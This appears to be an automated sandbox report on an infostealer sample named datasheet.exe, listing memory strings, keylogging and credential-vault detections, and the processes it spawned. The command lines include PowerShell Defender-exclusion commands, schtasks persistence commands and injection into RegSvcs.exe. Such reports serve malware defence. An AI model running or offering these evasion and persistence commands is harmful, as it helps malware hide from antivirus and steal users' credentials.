                    Source: RegSvcs.exe, 0000000F.00000002.4606620906.000000000316E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616251273.0000000006015000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615623153.0000000005F72000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614362804.00000000055D0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4604925690.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614478433.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000003041000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002E98000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002E45000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616702168.000000000605E000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616479784.0000000006046000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsrsaovsslca2018.crt07
                    Source: RegSvcs.exe, 00000009.00000002.2218212331.00000000031EC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.000000000316E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000003041000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000003294000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.000000000322A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.yandex.com
                    Source: datasheet.exe, 00000000.00000002.2188466952.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2213872719.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: datasheet.exe, 00000000.00000002.2188466952.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2218212331.0000000003171000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2213872719.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: RegSvcs.exe, 00000009.00000002.2218212331.0000000003171000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: RegSvcs.exe, 00000009.00000002.2218212331.0000000003171000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: RegSvcs.exe, 0000000F.00000002.4606620906.000000000316E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616251273.0000000006015000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615623153.0000000005F72000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614362804.00000000055D0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4604925690.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616102426.0000000005FF5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614478433.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614878043.0000000005653000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000003041000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615188392.000000000569C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002E98000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616215912.0000000006011000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002E45000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616672764.000000000605B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616352892.000000000601F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616702168.000000000605E000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616479784.0000000006046000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49711 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49716 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, J8Fc3eM3B.cs.Net Code: _0f2dkte
                    Source: 0.2.datasheet.exe.3d93ea0.2.raw.unpack, J8Fc3eM3B.cs.Net Code: _0f2dkte
                    Installs a global keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.datasheet.exe.3d93ea0.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.datasheet.exe.3dd06c0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.datasheet.exe.3d93ea0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: C:\Users\user\Desktop\datasheet.exeCode function: 0_2_02B3DF640_2_02B3DF64
                    Source: C:\Users\user\Desktop\datasheet.exeCode function: 0_2_0724B6500_2_0724B650
                    Source: C:\Users\user\Desktop\datasheet.exeCode function: 0_2_072416E80_2_072416E8
                    Source: C:\Users\user\Desktop\datasheet.exeCode function: 0_2_072416F80_2_072416F8
                    Source: C:\Users\user\Desktop\datasheet.exeCode function: 0_2_0724C3600_2_0724C360
                    Source: C:\Users\user\Desktop\datasheet.exeCode function: 0_2_0724BF280_2_0724BF28
                    Source: C:\Users\user\Desktop\datasheet.exeCode function: 0_2_0724BF170_2_0724BF17
                    Source: C:\Users\user\Desktop\datasheet.exeCode function: 0_2_07249F480_2_07249F48
                    Source: C:\Users\user\Desktop\datasheet.exeCode function: 0_2_07249B080_2_07249B08
                    Source: C:\Users\user\Desktop\datasheet.exeCode function: 0_2_07249B100_2_07249B10
                    Source: C:\Users\user\Desktop\datasheet.exeCode function: 0_2_07C01EC80_2_07C01EC8
                    Source: C:\Users\user\Desktop\datasheet.exeCode function: 0_2_07C000400_2_07C00040
                    Source: C:\Users\user\Desktop\datasheet.exeCode function: 0_2_07C035480_2_07C03548
                    Source: C:\Users\user\Desktop\datasheet.exeCode function: 0_2_07C000070_2_07C00007
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015FAA229_2_015FAA22
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015F4A889_2_015F4A88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015F3E709_2_015F3E70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015F41B89_2_015F41B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015FFB489_2_015FFB48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06AC45A09_2_06AC45A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06AC35509_2_06AC3550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06ACE2609_2_06ACE260
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06AC92789_2_06AC9278
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06AC10009_2_06AC1000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06ACA1D89_2_06ACA1D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06AC5DD09_2_06AC5DD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06AC56D89_2_06AC56D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06ACC4089_2_06ACC408
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06AC50589_2_06AC5058
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_06AC3C8B9_2_06AC3C8B
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeCode function: 11_2_02CCDF6411_2_02CCDF64
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeCode function: 11_2_0750F14911_2_0750F149
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeCode function: 11_2_0750B65011_2_0750B650
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeCode function: 11_2_075016F811_2_075016F8
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeCode function: 11_2_075016E811_2_075016E8
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeCode function: 11_2_0750C36011_2_0750C360
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeCode function: 11_2_07509F4811_2_07509F48
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeCode function: 11_2_0750BF1711_2_0750BF17
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeCode function: 11_2_0750BF2811_2_0750BF28
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeCode function: 11_2_07509B1011_2_07509B10
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeCode function: 11_2_0A8F0F7811_2_0A8F0F78
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeCode function: 11_2_0A8F25E811_2_0A8F25E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_012041B815_2_012041B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0120AA2815_2_0120AA28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01204A8815_2_01204A88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01203E7015_2_01203E70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0120FB4815_2_0120FB48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_05875DC815_2_05875DC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0587A1D015_2_0587A1D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0587E57815_2_0587E578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0587928015_2_05879280
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0587459815_2_05874598
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0587354815_2_05873548
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_05873C9815_2_05873C98
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0587C40015_2_0587C400
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0587505015_2_05875050
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0587033815_2_05870338
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_058756D015_2_058756D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0120AA2215_2_0120AA22
                    Source: datasheet.exe, 00000000.00000002.2188466952.0000000003D09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef20b0739-611c-4257-8b83-aec156cdf589.exe4 vs datasheet.exe
                    Source: datasheet.exe, 00000000.00000000.2134073777.0000000000812000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFfsv.exeB vs datasheet.exe
                    Source: datasheet.exe, 00000000.00000002.2188466952.0000000003F7F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs datasheet.exe
                    Source: datasheet.exe, 00000000.00000002.2184663835.0000000000F7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs datasheet.exe
                    Source: datasheet.exe, 00000000.00000002.2193397242.0000000007C20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs datasheet.exe
                    Source: datasheet.exe, 00000000.00000002.2187514566.0000000002D01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs datasheet.exe
                    Source: datasheet.exe, 00000000.00000002.2191844010.0000000005340000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs datasheet.exe
                    Source: datasheet.exe, 00000000.00000002.2192454248.000000000716C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs datasheet.exe
                    Source: datasheet.exe, 00000000.00000002.2192454248.000000000716C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs datasheet.exe
                    Source: datasheet.exe, 00000000.00000002.2187514566.0000000002D75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef20b0739-611c-4257-8b83-aec156cdf589.exe4 vs datasheet.exe
                    Source: datasheet.exeBinary or memory string: OriginalFilenameFfsv.exeB vs datasheet.exe
                    Source: datasheet.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.datasheet.exe.3d93ea0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.datasheet.exe.3dd06c0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.datasheet.exe.3d93ea0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: datasheet.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: EhzaIxEFbjyd.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, Dn9SD.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, Dn9SD.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, VM8ZCyu.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, VM8ZCyu.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, VM8ZCyu.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, VM8ZCyu.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, xJtxdMb61s.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, xJtxdMb61s.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, FNHBTlJ5ZnEVw5Eygp.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, FNHBTlJ5ZnEVw5Eygp.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, FNHBTlJ5ZnEVw5Eygp.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, lv8H2d9G3Iqa4sEWPO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, FNHBTlJ5ZnEVw5Eygp.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, FNHBTlJ5ZnEVw5Eygp.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, FNHBTlJ5ZnEVw5Eygp.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, lv8H2d9G3Iqa4sEWPO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/15@2/2
                    Source: C:\Users\user\Desktop\datasheet.exeFile created: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeMutant created: \Sessions\1\BaseNamedObjects\DlJnUntfTuDQ
                    Source: C:\Users\user\Desktop\datasheet.exeFile created: C:\Users\user\AppData\Local\Temp\tmp8D3A.tmpJump to behavior
                    Source: datasheet.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: datasheet.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\datasheet.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: datasheet.exeReversingLabs: Detection: 55%
                    Source: C:\Users\user\Desktop\datasheet.exeFile read: C:\Users\user\Desktop\datasheet.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\datasheet.exe "C:\Users\user\Desktop\datasheet.exe"
                    Source: C:\Users\user\Desktop\datasheet.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\datasheet.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\datasheet.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\datasheet.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\Desktop\datasheet.exeProcess created: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmpA381.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
